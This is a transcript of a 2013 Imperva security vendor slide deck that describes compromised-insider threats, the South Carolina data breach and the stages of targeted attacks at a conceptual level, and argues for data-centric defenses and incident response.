Targeted Defense for Malware & Targeted Attacks
-
Upload
imperva -
Category
Technology
-
view
2.268 -
download
1
description
Transcript of Targeted Defense for Malware & Targeted Attacks
© 2013 Imperva, Inc. All rights reserved.
Targeted Defense for Malware and Targeted Attacks
Confidential 1
Barry Shteiman Senior Security Strategist
© 2013 Imperva, Inc. All rights reserved.
Contents
Confidential 2
§ Compromised Insider § Incident Analysis § Anatomy of an Attack § Current Controls § Reclaiming Security
© 2013 Imperva, Inc. All rights reserved.
Compromised Insider
Confidential 3
Defining the Threat Landscape
© 2013 Imperva, Inc. All rights reserved. Confidential 4
“There are two types of companies: companies that have been breached and companies that don’t know they’ve been breached.” Shawn Henry, Former FBI Executive Assistant Director NY Times, April 2012
© 2013 Imperva, Inc. All rights reserved.
Insider Threat Defined
Confidential 5
Risk that the access rights of a trusted person will be used to view, take or modify data or intellectual property.
Possible causes: § Accident § Malicious intent § Compromised device
© 2013 Imperva, Inc. All rights reserved.
A person with no malicious motivation who becomes an unknowing accomplice of third parties who gain access to their device and/or user credentials.
6
Compromised Insider Defined
Confidential
© 2013 Imperva, Inc. All rights reserved.
Malicious Vs. Compromised Potential
Confidential 7
1% < 100%
Source: http://edocumentsciences.com/defend-against-compromised-insiders
© 2013 Imperva, Inc. All rights reserved.
Look Who Made the Headlines
Confidential 8
Hackers steal sensitive data related to a planned 2.4B acquisition.
Hacker stole 4-million Social Security numbers and bank account information from state tax payers and businesses
© 2013 Imperva, Inc. All rights reserved.
Know Your Attacker
Confidential 9
Governments • Stealing Intellectual Property (IP) and raw data, Espionage • Motivated by: Policy, Politics and Nationalism
Industrialized hackers • Stealing IP and data • Motivated by: Profit
Hacktivists • Exposing IP and data, and compromising the infrastructure • Motivated by: Political causes, ideology, personal agendas
© 2013 Imperva, Inc. All rights reserved.
What Attackers Are After
Confidential 10
Source: Verizon Data Breach Report, 2013
© 2013 Imperva, Inc. All rights reserved.
Data & IP
11
Two Paths, One Goal
User with access rights (or his/her
device)
Hacking (various) used in 52% of breaches
Online Application
Malware (40%) Social Engineering (29%)
Servers 54%
Confidential
Users (devices) 71% People 29%
Source: Verizon Data Breach Report, 2013
© 2013 Imperva, Inc. All rights reserved.
Incident Analysis
Confidential 12
The South Carolina Data Breach
© 2013 Imperva, Inc. All rights reserved.
What Happened?
Confidential 13
4M Individual Records Stolen in a Population of 5M
80%.
© 2013 Imperva, Inc. All rights reserved.
A Targeted Database Attack
Confidential 14
12-Sept-12 - 14-Sept-12
Attacker steals the entire database
27-Aug-12
Attacker logs in remotely and accesses the
database
13-Aug-12
Attacker steals login credentials
via phishing email & malware
29-Aug-12 - 11-Sept-12
Additional reconnaissance, more credentials
stolen
© 2013 Imperva, Inc. All rights reserved.
The Anatomy of an Attack
How Does It Work
15 Confidential
© 2013 Imperva, Inc. All rights reserved.
Anatomy of an Attack
Confidential 16
Spear Phishing
© 2013 Imperva, Inc. All rights reserved.
Anatomy of an Attack
Confidential 17
Spear Phishing
C&C Comm
© 2013 Imperva, Inc. All rights reserved.
Anatomy of an Attack
Confidential 18
Spear Phishing
C&C Comm
Data Dump & Analysis
© 2013 Imperva, Inc. All rights reserved.
Anatomy of an Attack
Confidential 19
Spear Phishing
C&C Comm
Data Dump & Analysis
Broaden Infection
© 2013 Imperva, Inc. All rights reserved.
Anatomy of an Attack
Confidential 20
Spear Phishing
C&C Comm
Data Dump & Analysis
Broaden Infection
Main Data Dump
© 2013 Imperva, Inc. All rights reserved.
Wipe Evidence
Anatomy of an Attack
Confidential 21
Spear Phishing
C&C Comm
Data Dump & Analysis
Broaden Infection
Main Data Dump
© 2013 Imperva, Inc. All rights reserved.
Searching on Social Networks…
Confidential 22
© 2013 Imperva, Inc. All rights reserved.
…The Results
Confidential 23
© 2013 Imperva, Inc. All rights reserved.
Next: Phishing and Malware
Confidential 24
How easy is it?
§ A three-month BlackHole license, with Support included, is US$700
Specialized Frameworks and Hacking tools, such as BlackHole 2.0, allow easy setup for Host Hijacking and Phishing.
© 2013 Imperva, Inc. All rights reserved.
Drive-by Downloads Are Another Route
Confidential 25
September 2012 “iPhone 5 Images Leak” was caused by a Trojan Download Drive-By
© 2013 Imperva, Inc. All rights reserved.
Cross Site Scripting Is Yet Another Path
Confidential 26
Persistent XSS Vulnerable Sites provide the Infection Platform
GMAIL, June 2012
TUMBLR, July 2012
© 2013 Imperva, Inc. All rights reserved.
The Human Behavior Factor
Confidential 27
Source: Google Research Paper “Alice in Warningland”, July 2013
© 2013 Imperva, Inc. All rights reserved.
Current Controls
Confidential 28
Won’t the NGFW/IPS/AV Stop It?
© 2013 Imperva, Inc. All rights reserved.
What Are the Experts Saying?
Confidential 29
“Flame was a failure for the antivirus industry. We really should have been able to do better. But we didn’t. We were out of our league, in our own game.”
Mikko Hypponen, F-Secure, Chief Research Officer Source: http://www.wired.com/threatlevel/2012/06/internet-security-fail/
© 2013 Imperva, Inc. All rights reserved.
Security Threats Have Evolved…
Confidential 30
2013 2001
AntiVirus Firewall IPS
AntiVirus Firewall IPS
Sources: Gartner, Imperva analysis
© 2013 Imperva, Inc. All rights reserved.
Security Redefined
Confidential 31
Forward Thinking
© 2013 Imperva, Inc. All rights reserved.
The DISA Angle
Confidential 32
“In the past, we’ve all been about protecting our networks—firewall here, firewall there, firewall within a service, firewall within an organization, firewalls within DISA. We’ve got to remove those and go to protecting the data” Lt. Gen. Ronnie Hawkins JR – DISA. AFCEA, July 2012
© 2013 Imperva, Inc. All rights reserved.
Rebalance Your Security Portfolio
Confidential 33
© 2013 Imperva, Inc. All rights reserved.
Assume You Can Be Breached
Confidential 34
© 2013 Imperva, Inc. All rights reserved.
Incident Response Phases for Targeted Attacks
Confidential 35
Reduce Risk
Prevent Compromise
Detection
Containment
Insulate sensitive data
Password Remediation
Device Remediation
Post-incident Analysis
Size Up the Target
Compromise A User
Initial Exploration
Solidify Presence
Impersonate Privileged User
Steal Confidential Data
Cover Tracks
© 2013 Imperva, Inc. All rights reserved.
www.imperva.com
36 Confidential